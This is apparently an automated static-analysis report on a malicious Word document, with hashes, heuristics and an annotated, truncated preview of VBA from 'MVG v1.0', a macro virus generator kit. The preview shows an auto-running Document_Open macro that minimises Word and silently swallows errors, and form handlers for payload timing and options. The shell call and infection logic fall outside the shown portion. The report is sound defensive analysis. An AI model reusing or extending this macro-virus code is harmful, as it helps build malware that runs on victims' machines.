Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 bda221dfbdb65321…

MALICIOUS

Office (OLE)

201.5 KB Created: 2000-07-17 17:04:00 Authoring application: Microsoft Word 9.0 First seen: 2012-06-14
MD5: 678c3c3587deaae71be6c64ac01724b6 SHA-1: fad2927926bb09158c35ff64cf5a59e58cdc7f54 SHA-256: bda221dfbdb6532167937e372faa8efe529d9972812cab5fe7e2a39d12eed667
Risk Score: 220

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1204.002 Malicious File

The sample contains a VBA macro (Document_Open) that runs automatically when the document is opened; it minimises the Word window and shows a UserForm. The extracted source identifies the document as "MVG v1.0", a Macro Virus Generator: a GUI-driven construction kit with Croatian/Serbian-language prompts whose main form collects a seconds/minutes/hours/days delay for a "time payload". The OLE_VBA_SHELL heuristic reports a Shell() call, which indicates command-execution capability, but that call lies outside the preview below and the visible code shows no download stage, so a "downloader" characterisation is not supported by what is shown here. ClamAV detects the file as Doc.Trojan.Serpent-1; the 2000 creation date and Word 9.0 authoring stamp are consistent with a Word-2000-era macro virus kit.

Heuristics 5

  • ClamAV: Doc.Trojan.Serpent-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Serpent-1
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 86395 bytes
SHA-256: 56efd0356f18b76c07de6d134199af4f97ac7efcc2772d6be1bf117ebe1aa32f
Preview script
First 1,000 lines of the extracted script (the preview below is cut off well before that; the reported Shell() call is not within the visible portion)
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
' Auto-exec entry point: Word runs Document_Open when the document is opened
' (this is what the OLE_VBA_DOCOPEN heuristic fires on). Any runtime error
' jumps to the `kraj` ("end") label, so failures are silently swallowed.
Private Sub Document_Open()
On Error GoTo kraj
' Minimise the Word window so the generator's form is what the user sees.
Application.WindowState = wdWindowStateMinimize
' Show the `stform` UserForm (the generator's start screen). This procedure
' itself calls no Shell(); the call reported by OLE_VBA_SHELL presumably sits
' in a part of the macro not shown in this preview -- confirm against the
' full extraction.
stform.Show
kraj:
End Sub

Attribute VB_Name = "stform"
Attribute VB_Base = "0{9D07C5A4-5BF6-11D4-9205-FDE1176FAF2D}{9D07C54F-5BF6-11D4-9205-FDE1176FAF2D}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
' Handler for the `cm1` button on the start form: shows a beta notice, then
' replaces the start form with the main generator form (`glavna`, "main").
' The prompt (Croatian/Serbian) reads roughly: "MVG v1.0 is in beta. I found
' no bugs, but if you do, remember this is a BETA version of the Macro Virus
' Generator. Enjoy!"; the title is a misspelt "Welcome!".
Private Sub cm1_click()
    Dim notice As String
    notice = "MVG v1.0 je u beta fazi. Nisam otkrio nikakve bug-ove, no ako ih otkrijes znaj da je ovo BETA verzija Macro Virus Generator-a. Uzivaj!"
    Call MsgBox(notice, vbInformation, "MVG v1.0 - Doborodosli!")
    ' Tear down the start form before the main form takes over.
    Unload stform
    Call glavna.Show
End Sub

' Easter-egg handler for `Image1` on the start form: pops a hint that the tool
' has hidden options ("hehe... you may find some hidden options in this tool!").
Private Sub Image1_Click()
    Dim hint As String
    hint = "hehehe...hehe...naci cete mozda neke skrivene opcije u ovoj alatki!"
    Call MsgBox(hint, vbInformation, "MVG v1.0 - Tips!")
End Sub

Attribute VB_Name = "glavna"
Attribute VB_Base = "0{9D07C5A7-5BF6-11D4-9205-FDE1176FAF2D}{9D07C557-5BF6-11D4-9205-FDE1176FAF2D}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
'==============================================================
' Module-level, untyped (Variant) globals shared by the generator's handlers.
' start_Click fills a..d from the sec/min/sati/dani text boxes (the "time
' payload" delay); the remaining names are presumably assigned further down,
' outside this preview. Note that `q` is missing from the list, and that
' glavna.Image1_Click declares a local `a` which shadows this one.
Public a, b, c, d, e, f, g, h, i, j, k, l, m, n, o, p, r, s, t
'==============================================================

' Handler for the `autor` ("author") button: opens the author info form.
Private Sub autor_Click()
    Call autorforma.Show
End Sub

' Fires when the `dani` ("days") delay box changes. Once it holds text, the
' other delay boxes and the payload option controls are enabled. The same
' body is duplicated in sec_Change, min_Change and sati_Change.
Private Sub dani_Change()
    If dani.Text = "" Then Exit Sub
    sec.Enabled = True
    tulzbris.Enabled = True
    insertbris.Enabled = True
    min.Enabled = True
    dani.Enabled = True
    brisvemen.Enabled = True
    selec.Enabled = True
    zaselec.Enabled = True
    printbes.Enabled = True
    odmahclose.Enabled = True
End Sub

' Handler for the `gret` button: opens the `gretforma` form (greetings,
' presumably -- the form itself is outside this preview).
Private Sub gret_Click()
    Call gretforma.Show
End Sub

' Easter-egg handler for `Image1` on the main form: draws a random Integer in
' 2..6 and shows one of three messages for 2, 4 and 6; odd draws (3, 5)
' show nothing. Rough translations: "When everything seems to be dying, it is
' in fact being born"; "Someone is scanning my soul... HEY! stop scanning!!"
' (apparently aimed at antivirus); the third is already English.
Private Sub Image1_Click()
    ' Declared Integer on purpose: Rnd*2+1 is in [1,3), doubled gives [2,6),
    ' and the assignment rounds it to a whole number.
    Dim roll As Integer
    roll = 2 * (Rnd * 2 + 1)
    Select Case roll
        Case 2
            Call MsgBox("Kad sve izgleda da umire, ono se ustvari radja", vbInformation, "MVG v1.0 - poetry!")
        Case 4
            Call MsgBox("Neko skenira moju dusu...HEJ! averzu prestani sa skeniranjem!!", vbInformation, "MVG v1.0 - agony!")
        Case 6
            Call MsgBox("hmmm....this is strange..somehow I moved....", vbInformation, "MVG v1.0 - mist!")
    End Select
End Sub

' Easter-egg handler for `Image2` on the main form: a teaser announcing a
' future variant named "Visio.NoFrx.d" (the name is only what the string
' says; nothing else here refers to it).
Private Sub Image2_Click()
    Dim teaser As String
    teaser = "Visio.NoFrx.d is coming soon on ur 'puters!  ....'till then, Stay tooned!"
    Call MsgBox(teaser, vbCritical, "MVG v1.0 - TIP!!!")
End Sub

' Handler for the `izlaz` ("exit") button: opens the exit confirmation form.
Private Sub izlaz_Click()
    Call userexit.Show
End Sub

' Handler for the `kont` button: opens the `kontakti` ("contacts") form.
Private Sub kont_Click()
    Call kontakti.Show
End Sub

' Fires when the `min` ("minutes") delay box changes. Once it holds text, the
' other delay boxes and the payload option controls are enabled. Same body
' as dani_Change, sati_Change and sec_Change.
Private Sub min_Change()
    If min.Text = "" Then Exit Sub
    sec.Enabled = True
    tulzbris.Enabled = True
    insertbris.Enabled = True
    min.Enabled = True
    dani.Enabled = True
    brisvemen.Enabled = True
    selec.Enabled = True
    zaselec.Enabled = True
    printbes.Enabled = True
    odmahclose.Enabled = True
End Sub

' Handler for the `mvginfo` button: opens the `infomvg` about form.
Private Sub mvginfo_Click()
    Call infomvg.Show
End Sub

' Handler for the `opcije2` ("options 2") button: opens `payforma`, which by
' its name is the payload options form (its contents are outside this preview).
Private Sub opcije2_Click()
    Call payforma.Show
End Sub

' Fires when the `sati` ("hours") delay box changes. Once it holds text, the
' other delay boxes and the payload option controls are enabled. Same body
' as dani_Change, min_Change and sec_Change.
Private Sub sati_Change()
    If sati.Text = "" Then Exit Sub
    sec.Enabled = True
    tulzbris.Enabled = True
    insertbris.Enabled = True
    min.Enabled = True
    dani.Enabled = True
    brisvemen.Enabled = True
    selec.Enabled = True
    zaselec.Enabled = True
    printbes.Enabled = True
    odmahclose.Enabled = True
End Sub

' Fires when the `sec` ("seconds") delay box changes. Once it holds text, the
' other delay boxes and the payload option controls are enabled. Same body
' as dani_Change, min_Change and sati_Change.
Private Sub sec_Change()
    If sec.Text = "" Then Exit Sub
    sec.Enabled = True
    tulzbris.Enabled = True
    insertbris.Enabled = True
    min.Enabled = True
    dani.Enabled = True
    brisvemen.Enabled = True
    selec.Enabled = True
    zaselec.Enabled = True
    printbes.Enabled = True
    odmahclose.Enabled = True
End Sub

' Toggle for the `selec` check box: when checked, the `zaselec` control is
' enabled and unlocked; when unchecked (or in any non-True state) it is only
' disabled and its Locked flag is left as it was.
Private Sub selec_Click()
    Select Case (selec.Value = True)
        Case True
            zaselec.Enabled = True
            zaselec.Locked = False
        Case Else
            zaselec.Enabled = False
    End Select
End Sub

Public Sub start_Click()
'===[ varijable za time payload ]========================
a = sec.Text: b = min.Text: c = sati.Text: d = dani.Text
'===[ varijable za HOOK infek
... (truncated)